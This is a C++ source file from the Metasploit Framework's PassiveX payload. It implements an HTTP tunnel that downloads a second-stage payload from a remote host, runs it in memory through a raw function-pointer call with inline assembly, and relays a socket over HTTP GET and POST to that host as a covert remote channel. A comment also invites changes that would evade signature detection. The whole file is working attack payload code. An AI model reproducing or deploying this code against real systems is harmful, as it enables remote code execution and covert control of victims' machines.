/* * This file is part of the Metasploit Exploit Framework * and is subject to the same licenses and copyrights as * the rest of this package. */ #include "PassiveXLib.h" #include "HttpTunnel.h" // The number of failed HTTP connections static DWORD FailedConnections = 0; HttpTunnel::HttpTunnel() : HttpHost(NULL), HttpUriBase(NULL), HttpSid(NULL), HttpPort(0), LocalTcpListener(0), LocalTcpClientSide(0), LocalTcpServerSide(0), InternetHandle(NULL), SendThread(NULL), ReceiveThread(NULL), SecondStageThread(NULL), SecondStage(NULL), SecondStageSize(0) { // Initialize winsock, not that we should need to. WSAStartup( MAKEWORD(2, 2), &WsaData); srand(time(NULL)); } HttpTunnel::~HttpTunnel() { Stop(); // Cleanup winsock WSACleanup(); } /* * Initiates the HTTP tunnel and gets the ball rolling */ DWORD HttpTunnel::Start( IN LPSTR InHttpHost, IN LPSTR InHttpUriBase, IN LPSTR InHttpSid, IN USHORT InHttpPort) { DWORD ThreadId; DWORD Result = ERROR_SUCCESS; do { // Initialize the hostname and port if (!(HttpHost = strdup(InHttpHost))) { Result = ERROR_NOT_ENOUGH_MEMORY; break; } if ((InHttpSid) && (InHttpSid[0]) && (!(HttpSid = strdup(InHttpSid)))) { Result = ERROR_NOT_ENOUGH_MEMORY; break; } if ((InHttpUriBase) && (InHttpUriBase[0]) && (!(HttpUriBase = strdup(InHttpUriBase)))) { Result = ERROR_NOT_ENOUGH_MEMORY; break; } // Eliminate any trailing slashes as to prevent potential problems. If // HttpUriBase is just "/", then it'll become virtuall unused. if ((HttpUriBase) && (HttpUriBase[strlen(HttpUriBase) - 1] == '/')) HttpUriBase[strlen(HttpUriBase) - 1] = 0; HttpPort = InHttpPort; // Acquire the internet context handle if (!(InternetHandle = InternetOpen( NULL, INTERNET_OPEN_TYPE_PRECONFIG, NULL, NULL, 0))) { Result = GetLastError(); break; } // Create the local TCP abstraction if ((Result = InitializeLocalConnection()) != ERROR_SUCCESS) { CPassiveX::Log( TEXT("Start(): InitializeLocalConnection failed, %lu.\n"), Result); break; } // Download the second stage if there is one DownloadSecondStage(); // Create the transmission thread if (!(SendThread = CreateThread( NULL, 0, (LPTHREAD_START_ROUTINE)SendThreadFuncSt, this, 0, &ThreadId))) { Result = GetLastError(); break; } // Create the receive thread if (!(ReceiveThread = CreateThread( NULL, 0, (LPTHREAD_START_ROUTINE)ReceiveThreadFuncSt, this, 0, &ThreadId))) { Result = GetLastError(); break; } // Woop Result = ERROR_SUCCESS; } while (0); return Result; } /* * Stops the HTTP tunnel and cleans up resources */ DWORD HttpTunnel::Stop() { DWORD Result = ERROR_SUCCESS; DWORD Index = 0; LPHANDLE Threads[] = { &SecondStageThread, &ReceiveThread, &SendThread, NULL }; // Terminate the threads that were spawned for (Index = 0; Threads[Index]; Index++) { LPHANDLE Thread = Threads[Index]; if (*Thread) { TerminateThread( *Thread, 0); CloseHandle( *Thread); *Thread = NULL; } } // Close all of the open sockets we may have if (LocalTcpListener) closesocket( LocalTcpListener); if (LocalTcpClientSide) closesocket( LocalTcpClientSide); if (LocalTcpServerSide) closesocket( LocalTcpServerSide); LocalTcpListener = 0; LocalTcpClientSide = 0; LocalTcpServerSide = 0; // Free up memory associated with the second stage if (SecondStage) { free( SecondStage); SecondStage = NULL; SecondStageSize = 0; } // Close the global internet handle acquired from InternetOpen if (InternetHandle) { InternetCloseHandle( InternetHandle); InternetHandle = NULL; } return Result; } /********************* * Protected Methods * *********************/ /* * Creates the local TCP abstraction that will be used as the socket for the * second stage that is read in */ DWORD HttpTunnel::InitializeLocalConnection() { struct sockaddr_in Sin; USHORT LocalPort = 0; DWORD Attempts = 0; DWORD Result = ERROR_SUCCESS; do { // Create the TCP listener socket if ((LocalTcpListener = socket( AF_INET, SOCK_STREAM, IPPROTO_TCP)) == INVALID_SOCKET) { LocalTcpListener = 0; Result = WSAGetLastError(); break; } // Create the TCP client socket if ((LocalTcpClientSide = socket( AF_INET, SOCK_STREAM, IPPROTO_TCP)) == INVALID_SOCKET) { LocalTcpClientSide = 0; Result = WSAGetLastError(); break; } Sin.sin_family = AF_INET; Sin.sin_addr.s_addr = inet_addr(""); // Try 256 times to pick a random port Sin.sin_port = htons(LocalPort = (rand() % 32000) + 1025); while ((bind( LocalTcpListener, (struct sockaddr *)&Sin, sizeof(Sin)) == SOCKET_ERROR) && (Attempts++ < 256)) { Sin.sin_port = htons(LocalPort = (rand() % 32000) + 1025); } // If we failed to create the local listener, bomb out if (Attempts >= 256) { Result = WSAGetLastError(); break; } // Listen and stuff if (listen( LocalTcpListener, 1) == SOCKET_ERROR) { Result = WSAGetLastError(); break; } // Establish a connection to the local listener if (connect( LocalTcpClientSide, (struct sockaddr *)&Sin, sizeof(Sin)) == SOCKET_ERROR) { Result = WSAGetLastError(); break; } // Accept the local TCP connection if ((LocalTcpServerSide = accept( LocalTcpListener, NULL, NULL)) == SOCKET_ERROR) { LocalTcpServerSide = 0; Result = WSAGetLastError(); break; } // Woop! Result = ERROR_SUCCESS; } while (0); return Result; } /* * Downloads the second stage payload from the remote HTTP host and executes it * in its own thread if there is one */ VOID HttpTunnel::DownloadSecondStage() { // Transmit the request to download the second stage. The stage buffer that // is passed back is never deallocated. if ((TransmitHttpRequest( TEXT("GET"), PASSIVEX_URI_SECOND_STAGE, NULL, 0, 30000, NULL, (PVOID *)&SecondStage, &SecondStageSize) == ERROR_SUCCESS) && (SecondStageSize)) { DWORD ThreadId = 0; CPassiveX::Log( TEXT("DownloadSecondStage(): Downloaded %lu byte second stage, executing it...\n"), SecondStageSize); // Create the second stage thread SecondStageThread = CreateThread( NULL, 0, (LPTHREAD_START_ROUTINE)SecondStageThreadFuncSt, this, 0, &ThreadId); } else { CPassiveX::Log( TEXT("DownloadSecondStage(): Failed to download second stage, %lu."), GetLastError()); ExitProcess(0); } } /* * Transmits the supplied data to the remote HTTP host */ DWORD HttpTunnel::TransmitToRemote( IN PUCHAR Buffer, IN ULONG BufferSize) { CPassiveX::Log( TEXT("TransmitToRemote(): Transmitting %lu bytes of data to the remote side of the TCP abstraction.\n"), BufferSize); return TransmitHttpRequest( "POST", PASSIVEX_URI_TUNNEL_IN, Buffer, BufferSize); } /* * Transmits the supplied data to the server side of the local TCP abstraction */ DWORD HttpTunnel::TransmitToLocal( IN PUCHAR Buffer, IN ULONG BufferSize) { DWORD Result = ERROR_SUCCESS; INT BytesWritten = 0; // Keep writing until everything has been written while (BufferSize > 0) { CPassiveX::Log( TEXT("TransmitToLocal(): Transmitting %lu bytes of data to the local side of the TCP abstraction.\n"), BufferSize); if ((BytesWritten = send( LocalTcpServerSide, (const char *)Buffer, BufferSize, 0)) == SOCKET_ERROR) { Result = WSAGetLastError(); break; } Buffer += BytesWritten; BufferSize -= BytesWritten; } return Result; } /* * Transmits an HTTP request to the target host, optionally waiting for a * response */ DWORD HttpTunnel::TransmitHttpRequest( IN LPTSTR Method, IN LPTSTR Uri, IN PVOID RequestPayload, IN ULONG RequestPayloadLength, IN ULONG WaitResponseTimeout, OUT LPDWORD ResponseCode, OUT PVOID *ResponsePayload, OUT LPDWORD ResponsePayloadLength) { HINTERNET RequestHandle = NULL; HINTERNET ConnectHandle = NULL; PUCHAR OutBuffer = NULL; DWORD OutBufferLength = 0; UCHAR ReadBuffer[8192]; DWORD ReadBufferLength; DWORD Result = ERROR_SUCCESS; PCHAR AdditionalHeaders = NULL; CHAR FullUri[1024]; // Construct the full URI if (HttpUriBase && HttpUriBase[0]) _snprintf(FullUri, sizeof(FullUri) - 1, "%s/%s", HttpUriBase, Uri); else strncpy(FullUri, Uri, sizeof(FullUri) - 1); FullUri[sizeof(FullUri) - 1] = 0; do { PROFILE_CHECKPOINT("InternetConnect ==>"); // Open a connection handle if (!(ConnectHandle = InternetConnect( InternetHandle, HttpHost, HttpPort, NULL, NULL, INTERNET_SERVICE_HTTP, 0, NULL))) { Result = GetLastError(); break; } PROFILE_CHECKPOINT("InternetConnect <=="); // If we were supplied a wait response timeout, set it if (WaitResponseTimeout) InternetSetOption( ConnectHandle, INTERNET_OPTION_RECEIVE_TIMEOUT, &WaitResponseTimeout, sizeof(WaitResponseTimeout)); PROFILE_CHECKPOINT("HttpOpenRequest ==>"); // Open a request handle if (!(RequestHandle = HttpOpenRequest( ConnectHandle, Method ? Method : TEXT("GET"), FullUri, NULL, NULL, NULL, INTERNET_FLAG_PRAGMA_NOCACHE | INTERNET_FLAG_NO_CACHE_WRITE | INTERNET_FLAG_RELOAD, NULL))) { Result = GetLastError(); break; } // If we were assigned an HTTP session identifier, then allocate an // additional header for transmission to the remote side. if (HttpSid) { // Yeah, I'm lame, this is easy to sig. Improve me if you care! if ((AdditionalHeaders = (PCHAR)malloc(strlen(HttpSid) + 32))) sprintf(AdditionalHeaders, "X-Sid: sid=%s\r\n", HttpSid); } PROFILE_CHECKPOINT("HttpOpenRequest <=="); PROFILE_CHECKPOINT("HttpSendRequest ==>"); // Send and endthe request if ((!HttpSendRequest( RequestHandle, AdditionalHeaders, (AdditionalHeaders) ? -1L : 0, RequestPayload, RequestPayloadLength))) { Result = GetLastError(); break; } PROFILE_CHECKPOINT("HttpSendRequest <=="); // If we wont be waiting for a response, break out now and return if (!WaitResponseTimeout) { Result = ERROR_SUCCESS; break; } // Keep looping until we've read the entire request or an error is // encountered while (1) { PUCHAR NewBuffer; ReadBufferLength = sizeof(ReadBuffer); PROFILE_CHECKPOINT("InternetReadFile ==>"); if (!InternetReadFile( RequestHandle, ReadBuffer, ReadBufferLength, &ReadBufferLength)) { Result = GetLastError(); break; } else if (!ReadBufferLength) { Result = ERROR_SUCCESS; break; } PROFILE_CHECKPOINT("InternetReadFile <=="); // Append the buffer to the output buffer if (!OutBuffer) NewBuffer = (PUCHAR)malloc( ReadBufferLength); else NewBuffer = (PUCHAR)realloc( OutBuffer, OutBufferLength + ReadBufferLength); if (!NewBuffer) { Result = ERROR_NOT_ENOUGH_MEMORY; break; } memcpy( NewBuffer + OutBufferLength, ReadBuffer, ReadBufferLength); OutBuffer = NewBuffer; OutBufferLength += ReadBufferLength; } // Query the status code of the response if (ResponseCode) { DWORD ResponseCodeSize = sizeof(DWORD); if (!HttpQueryInfo( RequestHandle, HTTP_QUERY_STATUS_CODE, ResponseCode, &ResponseCodeSize, NULL)) { CPassiveX::Log( TEXT("HttpQueryInfo failed, %lu."), GetLastError()); *ResponseCode = 0; } } } while (0); PROFILE_CHECKPOINT("Finished TransmitHttpRequest"); // Close handles if (RequestHandle) InternetCloseHandle( RequestHandle); if (ConnectHandle) InternetCloseHandle( ConnectHandle); if (AdditionalHeaders) free(AdditionalHeaders); // Set the output pointers or free up the output buffer if (Result == ERROR_SUCCESS) { if (ResponsePayload) *ResponsePayload = OutBuffer; if (ResponsePayloadLength) *ResponsePayloadLength = OutBufferLength; FailedConnections = 0; } else { // If we fail to connect... if (Result == ERROR_INTERNET_CANNOT_CONNECT) { FailedConnections++; if (FailedConnections > 10) { CPassiveX::Log("TransmitHttpRequest(): Failed to connect to HTTP server (%lu), exiting.", FailedConnections); ExitProcess(0); } } if (OutBuffer) free( OutBuffer); } return Result; } /* * Method wrapper */ ULONG HttpTunnel::SendThreadFuncSt( IN HttpTunnel *Tunnel) { return Tunnel->SendThreadFunc(); } /* * Monitors the server side of the local TCP abstraction for data that can be * transmitted to the remote half of the pipe */ ULONG HttpTunnel::SendThreadFunc() { fd_set FdSet; UCHAR ReadBuffer[16384]; LONG BytesRead; INT Result; // This is the song that never ends... while (1) { FD_ZERO( &FdSet); FD_SET( LocalTcpServerSide, &FdSet); PROFILE_CHECKPOINT("select ==>"); // Wait for some data... Result = select( LocalTcpServerSide + 1, &FdSet, NULL, NULL, NULL); PROFILE_CHECKPOINT("select <=="); // If select failed or there was no new data, act accordingly else risk // the fist of the evil witch if (Result < 0) { CPassiveX::Log( TEXT("SendThreadFunc(): TUNNEL_IN: Select failed, %lu.\n"), WSAGetLastError()); break; } else if (Result == 0) continue; PROFILE_CHECKPOINT("recv ==>"); // Read in data from the local server side of the TCP connection BytesRead = recv( LocalTcpServerSide, (char *)ReadBuffer, sizeof(ReadBuffer), 0); PROFILE_CHECKPOINT("recv <=="); // On error or end of file... if (BytesRead <= 0) { CPassiveX::Log( TEXT("SendThreadFunc(): TUNNEL_IN: Read 0 or fewer bytes, erroring out (%lu).\n"), BytesRead); break; } CPassiveX::Log( TEXT("SendThreadFunc(): TUNNEL_IN: Transmitting %lu bytes of data to remote side.\n"), BytesRead); PROFILE_CHECKPOINT("TransmitToRemote ==>"); // Transmit the data to the remote side if ((Result = TransmitToRemote( ReadBuffer, BytesRead)) != ERROR_SUCCESS) { CPassiveX::Log( TEXT("SendThreadFunc(): TUNNEL_IN: TransmitToRemote failed, %lu.\n"), Result); } PROFILE_CHECKPOINT("TransmitToRemote <=="); } // Exit the process if the send thread ends ExitProcess(0); return 0; } /* * Method wrapper */ ULONG HttpTunnel::ReceiveThreadFuncSt( IN HttpTunnel *Tunnel) { return Tunnel->ReceiveThreadFunc(); } /* * Polls for data that should be sent to the local server side of the TCP * abstraction */ ULONG HttpTunnel::ReceiveThreadFunc() { PUCHAR ReadBuffer = NULL; DWORD ReadBufferLength = 0; DWORD ResponseCode = 0; while (1) { ReadBufferLength = 0; ReadBuffer = NULL; ResponseCode = 0; if ((TransmitHttpRequest( TEXT("GET"), PASSIVEX_URI_TUNNEL_OUT, NULL, 0, 30000, &ResponseCode, (PVOID *)&ReadBuffer, &ReadBufferLength) == ERROR_SUCCESS) && (ReadBuffer)) { CPassiveX::Log( TEXT("ReceiveThreadFunc(): TUNNEL_OUT: Received response code %lu, buffer length %lu.\n"), ResponseCode, ReadBufferLength); TransmitToLocal( ReadBuffer, ReadBufferLength); free( ReadBuffer); } else { CPassiveX::Log( TEXT("ReceiveThreadFunc(): TUNNEL_OUT: TransmitHttpRequest failed, %lu.\n"), GetLastError()); } } return 0; } /* * Calls the second stage after initializing the proper registers */ ULONG HttpTunnel::SecondStageThreadFuncSt( IN HttpTunnel *Tunnel) { SOCKET Fd = Tunnel->LocalTcpClientSide; // Initialize edi to the file descriptor that the second stage might use __asm { lea eax, [Fd] mov edi, [eax] } ((VOID (*)())Tunnel->SecondStage)(); return 0; }